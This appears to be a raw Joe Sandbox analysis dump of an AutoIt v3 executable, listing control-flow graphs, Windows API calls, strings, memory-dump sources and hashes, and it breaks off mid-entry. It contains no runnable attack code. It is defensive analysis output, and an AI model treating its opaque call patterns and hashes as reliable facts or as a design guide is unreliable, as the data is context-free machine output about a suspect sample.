                                                                                                                  control_flow_graph 1342 dcb74b-dcb7ac VariantInit call d7ca8e CoInitialize 1345 dcb7ae CoUninitialize 1342->1345 1346 dcb7b4-dcb7c7 call d8d5f6 1342->1346 1345->1346 1349 dcb7c9-dcb7d0 call d7ca8e 1346->1349 1350 dcb7d5-dcb7dc 1346->1350 1349->1350 1352 dcb7de-dcb805 call d784a6 call daa857 1350->1352 1353 dcb81b-dcb85b call d784a6 call d8f885 1350->1353 1352->1353 1364 dcb807-dcb816 call dcc235 1352->1364 1362 dcb861-dcb86e 1353->1362 1363 dcb9d3-dcba17 SetErrorMode CoGetInstanceFromFile 1353->1363 1366 dcb8a8-dcb8b6 GetRunningObjectTable 1362->1366 1367 dcb870-dcb881 call d8d5f6 1362->1367 1368 dcba1f-dcba3a CoGetObject 1363->1368 1369 dcba19-dcba1d 1363->1369 1378 dcbad0-dcbae3 VariantClear 1364->1378 1371 dcb8b8-dcb8c9 1366->1371 1372 dcb8d5-dcb8e8 call dcc235 1366->1372 1387 dcb8a0 1367->1387 1388 dcb883-dcb88d call d7cdb4 1367->1388 1375 dcba3c 1368->1375 1376 dcbab5-dcbac5 call dcc235 SetErrorMode 1368->1376 1374 dcba40-dcba47 SetErrorMode 1369->1374 1392 dcb8ed-dcb8fc 1371->1392 1393 dcb8cb-dcb8d0 1371->1393 1389 dcbac7-dcbacb call d75cd3 1372->1389 1377 dcba4b-dcba51 1374->1377 1375->1374 1376->1389 1383 dcbaa8-dcbaab 1377->1383 1384 dcba53-dcba55 1377->1384 1383->1376 1390 dcba8d-dcbaa6 call dba6f6 1384->1390 1391 dcba57-dcba78 call daac4b 1384->1391 1387->1366 1388->1387 1402 dcb88f-dcb89e call d7cdb4 1388->1402 1389->1378 1390->1389 1391->1390 1403 dcba7a-dcba83 1391->1403 1401 dcb907-dcb91b 1392->1401 1393->1372 1407 dcb9bb-dcb9d1 1401->1407 1408 dcb921-dcb925 1401->1408 1402->1366 1403->1390 1407->1377 1408->1407 1410 dcb92b-dcb940 1408->1410 1413 dcb9a2-dcb9ac 1410->1413 1414 dcb942-dcb957 1410->1414 1413->1401 1414->1413 1418 dcb959-dcb983 call daac4b 1414->1418 1422 dcb994-dcb99e 1418->1422 1423 dcb985-dcb98d 1418->1423 1422->1413 1424 dcb98f-dcb990 1423->1424 1425 dcb9b1-dcb9b6 1423->1425 1424->1422 1425->1407
                                                                                                                  APIs
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00DCB777
                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00DCB7A4
                                                                                                                  • CoUninitialize.COMBASE ref: 00DCB7AE
                                                                                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00DCB8AE
                                                                                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00DCB9DB
                                                                                                                  • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 00DCBA0F
                                                                                                                  • CoGetObject.OLE32(?,00000000,00DFD91C,?), ref: 00DCBA32
                                                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00DCBA45
                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00DCBAC5
                                                                                                                  • VariantClear.OLEAUT32(00DFD91C), ref: 00DCBAD5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2395222682-0
                                                                                                                  • Opcode ID: 9a63c13ec308cf1a61cbd7af98b5194cf9e4e39cba25822b2ed06773e3890396
                                                                                                                  • Instruction ID: 9145d1680e89a8f196ac46fb986cb03923a09fa283c1e8cd7ac4bd48c19fd938
                                                                                                                  • Opcode Fuzzy Hash: 9a63c13ec308cf1a61cbd7af98b5194cf9e4e39cba25822b2ed06773e3890396
                                                                                                                  • Instruction Fuzzy Hash: 9DC10371608306AFC700DF68C885A2AB7EAFF89314F14491DF58ADB251DB71ED05CB62

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00D72F8B
                                                                                                                  • RegisterClassExW.USER32(00000030), ref: 00D72FB5
                                                                                                                  • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00D72FC6
                                                                                                                  • LoadIconW.USER32(000000A9), ref: 00D73009
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                  • API String ID: 975902462-1005189915
                                                                                                                  • Opcode ID: dee1c16b1db7e422f4d8a9d2dc9afdd46a603c100ea5f537cc0e16f1c71bb9b4
                                                                                                                  • Instruction ID: 86df3d66c34706ded0a9d949a4066f8468801b8cef2b0b11a27f9a179e54427f
                                                                                                                  • Opcode Fuzzy Hash: dee1c16b1db7e422f4d8a9d2dc9afdd46a603c100ea5f537cc0e16f1c71bb9b4
                                                                                                                  • Instruction Fuzzy Hash: EF21B4B5900318AFDB00AF95E849BDDBFB6FB08700F00815AF615F62A0D7B04548CFA5

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1431 dd23c5-dd2426 call d91970 1434 dd2428-dd243b call d7cdb4 1431->1434 1435 dd2452-dd2456 1431->1435 1443 dd243d-dd2450 call d7cdb4 1434->1443 1444 dd2488 1434->1444 1437 dd249d-dd24a3 1435->1437 1438 dd2458-dd2468 call d7cdb4 1435->1438 1440 dd24b8-dd24be 1437->1440 1441 dd24a5-dd24a8 1437->1441 1453 dd246b-dd2484 call d7cdb4 1438->1453 1446 dd24c8-dd24e2 call d784a6 call d73bcf 1440->1446 1447 dd24c0 1440->1447 1445 dd24ab-dd24b0 call d7cdb4 1441->1445 1443->1453 1449 dd248b-dd248f 1444->1449 1445->1440 1464 dd24e8-dd2541 call d784a6 call d73bcf call d784a6 call d73bcf call d784a6 call d73bcf 1446->1464 1465 dd25a1-dd25a9 1446->1465 1447->1446 1454 dd2499-dd249b 1449->1454 1455 dd2491-dd2497 1449->1455 1453->1437 1463 dd2486 1453->1463 1454->1437 1454->1440 1455->1445 1463->1449 1513 dd256f-dd259f GetSystemDirectoryW call d9010a GetSystemDirectoryW 1464->1513 1514 dd2543-dd255e call d784a6 call d73bcf 1464->1514 1467 dd25ab-dd25c6 call d784a6 call d73bcf 1465->1467 1468 dd25d3-dd2601 GetCurrentDirectoryW call d9010a GetCurrentDirectoryW 1465->1468 1467->1468 1484 dd25c8-dd25d1 call d918fb 1467->1484 1476 dd2605 1468->1476 1479 dd2609-dd260d 1476->1479 1482 dd260f-dd2639 call d7ca8e * 3 1479->1482 1483 dd263e-dd264e call db9a8f 1479->1483 1482->1483 1495 dd26aa 1483->1495 1496 dd2650-dd269b call dba17a call dba073 call dba102 1483->1496 1484->1468 1484->1483 1498 dd26ac-dd26bb 1495->1498 1496->1498 1527 dd269d-dd26a8 1496->1527 1502 dd274c-dd2768 CreateProcessW 1498->1502 1503 dd26c1-dd26f1 call dabc90 call d918fb 1498->1503 1509 dd276b-dd277e call d9017e * 2 1502->1509 1528 dd26fa-dd270a call d918fb 1503->1528 1529 dd26f3-dd26f8 1503->1529 1532 dd27bd-dd27c9 CloseHandle 1509->1532 1533 dd2780-dd27b8 call dbd7e4 GetLastError call d77ba9 call d82570 1509->1533 1513->1476 1514->1513 1535 dd2560-dd2569 call d918fb 1514->1535 1527->1498 1539 dd270c-dd2711 1528->1539 1540 dd2713-dd2723 call d918fb 1528->1540 1529->1528 1529->1529 1537 dd27cb-dd27f0 call db9d09 call dba37f call dd2881 1532->1537 1538 dd27f5-dd27f9 1532->1538 1548 dd283e-dd284f call db9b29 1533->1548 1535->1479 1535->1513 1537->1538 1542 dd27fb-dd2805 1538->1542 1543 dd2807-dd2811 1538->1543 1539->1539 1539->1540 1559 dd272c-dd274a call d9017e * 3 1540->1559 1560 dd2725-dd272a 1540->1560 1542->1548 1549 dd2819-dd2838 call d82570 CloseHandle 1543->1549 1550 dd2813 1543->1550 1549->1548 1550->1549 1559->1509 1560->1559 1560->1560
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00DD23E6
                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DD2579
                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DD259D
                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DD25DD
                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DD25FF
                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00DD2760
                                                                                                                  • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00DD2792
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00DD27C1
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00DD2838
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4090791747-0
                                                                                                                  • Opcode ID: 80579e8da3a3165a77648856e92337b31f20b602c608bf75c045a1a6ad0a9ec2
                                                                                                                  • Instruction ID: de37a87d768b96e86cfbdf8bf2c7cd34f4da7ecbc403b9c9eaab1f870863747a
                                                                                                                  • Opcode Fuzzy Hash: 80579e8da3a3165a77648856e92337b31f20b602c608bf75c045a1a6ad0a9ec2
                                                                                                                  • Instruction Fuzzy Hash: 39D17E356043019FCB25EF24D891A6ABBE5EF95314F18845EF8999B3A2DB30DC41CB72

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1572 dcc8b7-dcc8f1 1573 dcccfb-dcccff 1572->1573 1574 dcc8f7-dcc8fa 1572->1574 1576 dccd04-dccd05 1573->1576 1574->1573 1575 dcc900-dcc903 1574->1575 1575->1573 1577 dcc909-dcc912 call dccff8 1575->1577 1578 dccd06 call dcc235 1576->1578 1583 dcc914-dcc920 1577->1583 1584 dcc925-dcc92e call dbbe14 1577->1584 1582 dccd0b-dccd0f 1578->1582 1583->1578 1587 dcc934-dcc93a 1584->1587 1588 dccc61-dccc6c call d7d2c0 1584->1588 1589 dcc93c-dcc93e 1587->1589 1590 dcc940 1587->1590 1596 dccc6e-dccc72 1588->1596 1597 dccca9-dcccb4 call d7d2c0 1588->1597 1592 dcc942-dcc94a 1589->1592 1590->1592 1594 dcccec-dcccf4 1592->1594 1595 dcc950-dcc967 call daabf3 1592->1595 1594->1573 1605 dcc969-dcc96e 1595->1605 1606 dcc973-dcc97f 1595->1606 1598 dccc78 1596->1598 1599 dccc74-dccc76 1596->1599 1597->1594 1608 dcccb6-dcccba 1597->1608 1602 dccc7a-dccc98 call d8d6b4 call db97b6 1598->1602 1599->1602 1624 dccc99-dccca7 call dbd7e4 1602->1624 1605->1576 1609 dcc9ce-dcc9f9 call d8fa89 1606->1609 1610 dcc981-dcc98d 1606->1610 1612 dcccbc-dcccbe 1608->1612 1613 dcccc0 1608->1613 1625 dcca18-dcca1a 1609->1625 1626 dcc9fb-dcca16 call d8ac65 1609->1626 1610->1609 1615 dcc98f-dcc99c call daa8c8 1610->1615 1614 dcccc2-dcccea call d8d6b4 call db503c call d82570 1612->1614 1613->1614 1614->1624 1623 dcc9a1-dcc9a6 1615->1623 1623->1609 1629 dcc9a8-dcc9af 1623->1629 1624->1582 1627 dcca1d-dcca24 1625->1627 1626->1627 1633 dcca26-dcca30 1627->1633 1634 dcca52-dcca59 1627->1634 1636 dcc9be-dcc9c5 1629->1636 1637 dcc9b1-dcc9b8 1629->1637 1639 dcca32-dcca48 call daa25b 1633->1639 1642 dccadf-dccaec 1634->1642 1643 dcca5f-dcca66 1634->1643 1636->1609 1644 dcc9c7 1636->1644 1637->1636 1641 dcc9ba 1637->1641 1654 dcca4a-dcca50 1639->1654 1641->1636 1645 dccaee-dccaf8 1642->1645 1646 dccafb-dccb28 VariantInit call d91970 1642->1646 1643->1642 1649 dcca68-dcca7b 1643->1649 1644->1609 1645->1646 1658 dccb2d-dccb30 1646->1658 1659 dccb2a-dccb2b 1646->1659 1652 dcca7c-dcca84 1649->1652 1655 dcca86-dccaa3 VariantClear 1652->1655 1656 dccad1-dccada 1652->1656 1654->1634 1660 dccabc-dccacc 1655->1660 1661 dccaa5-dccab9 SysAllocString 1655->1661 1656->1652 1657 dccadc 1656->1657 1657->1642 1662 dccb31-dccb43 1658->1662 1659->1662 1660->1656 1663 dccace 1660->1663 1661->1660 1664 dccb47-dccb4c 1662->1664 1663->1656 1665 dccb4e-dccb52 1664->1665 1666 dccb8a-dccb8c 1664->1666 1669 dccb54-dccb86 1665->1669 1670 dccba1-dccba5 1665->1670 1667 dccb8e-dccb95 1666->1667 1668 dccbb4-dccbd5 call dbd7e4 call dba6f6 1666->1668 1667->1670 1671 dccb97-dccb9f 1667->1671 1678 dccc41-dccc50 VariantClear 1668->1678 1682 dccbd7-dccbe0 1668->1682 1669->1666 1672 dccba6-dccbaf call dcc235 1670->1672 1671->1672 1672->1678 1680 dccc5a-dccc5c 1678->1680 1681 dccc52-dccc55 call db1693 1678->1681 1680->1582 1681->1680 1684 dccbe2-dccbef 1682->1684 1685 dccc38-dccc3f 1684->1685 1686 dccbf1-dccbf8 1684->1686 1685->1678 1685->1684 1687 dccbfa-dccc0a 1686->1687 1688 dccc26-dccc2a 1686->1688 1687->1685 1691 dccc0c-dccc14 1687->1691 1689 dccc2c-dccc2e 1688->1689 1690 dccc30 1688->1690 1693 dccc32-dccc33 call dba6f6 1689->1693 1690->1693 1691->1688 1692 dccc16-dccc1c 1691->1692 1692->1688 1694 dccc1e-dccc24 1692->1694 1693->1685 1694->1685 1694->1688
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                  • API String ID: 0-572801152
                                                                                                                  • Opcode ID: 94489e9a55c928d2079ba07dc6a08bb73bb8c34797393404a41779cdaf644a4e
                                                                                                                  • Instruction ID: caac15fa7b7acfb32cbf395406a35b87620ad90c2916ab58f9a0f9e9f5224d36
                                                                                                                  • Opcode Fuzzy Hash: 94489e9a55c928d2079ba07dc6a08bb73bb8c34797393404a41779cdaf644a4e
                                                                                                                  • Instruction Fuzzy Hash: 72E19F71A1021AABDF10DFA8C985FAE77B5EF48314F18902DEA49AB281D770DD41CB70

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1696 dcbf80-dcbfe1 call d91970 1699 dcc21b-dcc21d 1696->1699 1700 dcbfe7-dcbfeb 1696->1700 1701 dcc21e-dcc21f 1699->1701 1700->1699 1702 dcbff1-dcbff6 1700->1702 1703 dcc224-dcc226 1701->1703 1702->1699 1704 dcbffc-dcc00b call dbbe14 1702->1704 1705 dcc227 1703->1705 1710 dcc158-dcc15c 1704->1710 1711 dcc011-dcc015 1704->1711 1707 dcc229 call dcc235 1705->1707 1714 dcc22e-dcc232 1707->1714 1712 dcc16d 1710->1712 1713 dcc15e-dcc160 1710->1713 1715 dcc01b 1711->1715 1716 dcc017-dcc019 1711->1716 1718 dcc16f-dcc171 1712->1718 1713->1718 1717 dcc01d-dcc01f 1715->1717 1716->1717 1719 dcc021-dcc025 1717->1719 1720 dcc033-dcc03e 1717->1720 1718->1701 1721 dcc177-dcc17b 1718->1721 1719->1720 1722 dcc027-dcc031 1719->1722 1720->1705 1723 dcc17d-dcc17f 1721->1723 1724 dcc181 1721->1724 1722->1720 1725 dcc043-dcc05f 1722->1725 1726 dcc183-dcc186 1723->1726 1724->1726 1733 dcc067-dcc081 1725->1733 1734 dcc061-dcc065 1725->1734 1727 dcc188-dcc18e 1726->1727 1728 dcc193-dcc197 1726->1728 1727->1703 1729 dcc19d 1728->1729 1730 dcc199-dcc19b 1728->1730 1732 dcc19f-dcc1c9 VariantInit VariantClear 1729->1732 1730->1732 1740 dcc1cb-dcc1cd 1732->1740 1741 dcc1e6-dcc1ea 1732->1741 1742 dcc089 1733->1742 1743 dcc083-dcc087 1733->1743 1734->1733 1735 dcc090-dcc0e5 call d8fa89 VariantInit call d91a00 1734->1735 1758 dcc108-dcc10d 1735->1758 1759 dcc0e7-dcc0f1 1735->1759 1740->1741 1744 dcc1cf-dcc1e1 call d82570 1740->1744 1745 dcc1ec-dcc1ee 1741->1745 1746 dcc1f0-dcc1fe call d82570 1741->1746 1742->1735 1743->1735 1743->1742 1757 dcc0fb-dcc0fe 1744->1757 1745->1746 1749 dcc201-dcc219 call dba6f6 VariantClear 1745->1749 1746->1749 1749->1714 1757->1707 1762 dcc10f-dcc131 1758->1762 1763 dcc162-dcc16b 1758->1763 1760 dcc103-dcc106 1759->1760 1761 dcc0f3-dcc0fa 1759->1761 1760->1757 1761->1757 1766 dcc13b-dcc13d 1762->1766 1767 dcc133-dcc139 1762->1767 1763->1757 1768 dcc141-dcc157 call dba6f6 1766->1768 1767->1757 1768->1710
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearInit$_memset
                                                                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                  • API String ID: 2862541840-625585964
                                                                                                                  • Opcode ID: 205e1fe7d5b76029e97e49409e32450ab4dfed68ada3b817650b966acc08d035
                                                                                                                  • Instruction ID: bea45aa9880b45e315f6f0d0c83e0ba0c11d5193e15d298e275d5b1071644dab
                                                                                                                  • Opcode Fuzzy Hash: 205e1fe7d5b76029e97e49409e32450ab4dfed68ada3b817650b966acc08d035
                                                                                                                  • Instruction Fuzzy Hash: DF91AB71A1031AABDB24CFA5D844FAEBBB8EF45710F14911DFA19AB281D7709941CFB0
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00D8EADA,?,?), ref: 00D8EB27
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,00D8EADA,?,?), ref: 00DE4B26
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,00D8EADA,?,?), ref: 00DE4B65
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00D8EADA,?,?), ref: 00DE4B94
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: QueryValue$CloseOpen
                                                                                                                  • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                  • API String ID: 1586453840-614718249
                                                                                                                  • Opcode ID: c72bceddfd729a2bacf04a0dc7a5896058ecedb1a7545cf06b6c21aa6bd86270
                                                                                                                  • Instruction ID: 4cc177d315795fd69ce53055209758ce081267566a5a254eaead0ad7fa5ca804
                                                                                                                  • Opcode Fuzzy Hash: c72bceddfd729a2bacf04a0dc7a5896058ecedb1a7545cf06b6c21aa6bd86270
                                                                                                                  • Instruction Fuzzy Hash: A3115E71A04208BEEB04EBA4DD86EFEB7BDEF04355F104459F906E6191EA70AE41DB70
                                                                                                                  APIs
                                                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D72ECB
                                                                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D72EEC
                                                                                                                  • ShowWindow.USER32(00000000), ref: 00D72F00
                                                                                                                  • ShowWindow.USER32(00000000), ref: 00D72F09
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$CreateShow
                                                                                                                  • String ID: AutoIt v3$edit
                                                                                                                  • API String ID: 1584632944-3779509399
                                                                                                                  • Opcode ID: e1d69a10fadd66b52713373f53f724dab9283a1fce3ae2dd6f2c95f029540336
                                                                                                                  • Instruction ID: b5715bdaae88e4a1d611898810127b7eb6e6d61e62b7a45183395ecf3f23b7f3
                                                                                                                  • Opcode Fuzzy Hash: e1d69a10fadd66b52713373f53f724dab9283a1fce3ae2dd6f2c95f029540336
                                                                                                                  • Instruction Fuzzy Hash: 6CF01D706442D87ED72057576C4CE773E7ED7C6F20F01405EB904B21A0C2610889DAB0
                                                                                                                  APIs
                                                                                                                  • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00DC9409
                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00DC9416
                                                                                                                  • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00DC943A
                                                                                                                  • _strlen.LIBCMT ref: 00DC9484
                                                                                                                  • _memmove.LIBCMT ref: 00DC94CA
                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00DC94F7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
